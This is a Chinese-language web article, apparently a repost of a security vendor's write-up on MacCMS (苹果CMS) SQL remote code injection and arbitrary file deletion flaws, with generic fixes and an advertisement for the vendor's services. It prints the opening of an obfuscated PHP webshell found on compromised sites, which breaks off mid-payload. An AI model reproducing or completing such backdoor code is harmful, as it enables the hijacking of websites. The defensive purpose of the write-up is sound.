苹果CMS漏洞修复 对SQL远程代码注入及任意文件删除修补办法

   日期:2024-12-24    作者:hubinusb 浏览:61    移动:http://w.yusign.com/mobile/quote/4262.html

目前苹果CMS官方在不断的升级补丁,官方最新的漏洞补丁对于目前爆发的新漏洞没有任何效果。更新补丁的用户网站还是会遭受到挂马的攻击,很多客户因此找到我们SINE安全寻求网站安全技术上的支持,针对该漏洞我们有着独特的安全解决方案以及防止挂马攻击的防护,包括一些未公开的maccms POC漏洞都有修复补丁。


目前maccms官方被百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改! 苹果官方网站因为特殊原因已经停止访问,该内容被禁止访问,但是升级补丁更新的网址还是可以打开的。


error_reporting(E_ERROR);

@ini_set('display_errors','Off');

@ini_set('max_execution_time',20000);

@ini_set('memory_limit','256M');

header("content-Type: text/html; charset=utf-8");

$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..

define('Viv, bebegim.','Denzel-你的英雄'); // 标题

function s(){

$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s

7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323

代码如上面所示,是加密过的,经过我们SINE安全的解密发现是PHP的脚本木马,可以绕过各大服务器厂商的安全检测,包括阿里云,腾讯云,百度云,华为云。


关于苹果CMS网站漏洞的修复方案与办法

对任意文件删除漏洞做安全过滤与检查,防止del删除的语句的执行,对前端传输过来的参数进行严格的检测,不管是get,post,cookies,如果您对代码不是太懂的话也可以找专业的网站安全公司来处理解决苹果CMS网站被攻击的问题,或者是对重装文件进行改名以及安装配置文件进行权限设置,只读权限,对于存在网站木马后门的苹果cms系统,人工对代码进行安全审计,对所有网站目录下每个代码文件都要仔细的排查,可以下载官方的源代码进行比对。

本文地址:http://w.yusign.com/quote/4262.html    述古往 http://w.yusign.com/static/ , 查看更多

特别提示:本信息由相关用户自行提供,真实性未证实,仅供参考。请谨慎采用,风险自负。


举报收藏 0评论 0
0相关评论
相关行情
推荐行情
点击排行
{
网站首页  |  关于我们  |  联系方式  |  用户协议  |  隐私政策  |  版权声明  |  网站地图  |  排名推广  |  广告服务  |  积分换礼  |  网站留言  |  RSS订阅  |  违规举报  |  鄂ICP备2020018471号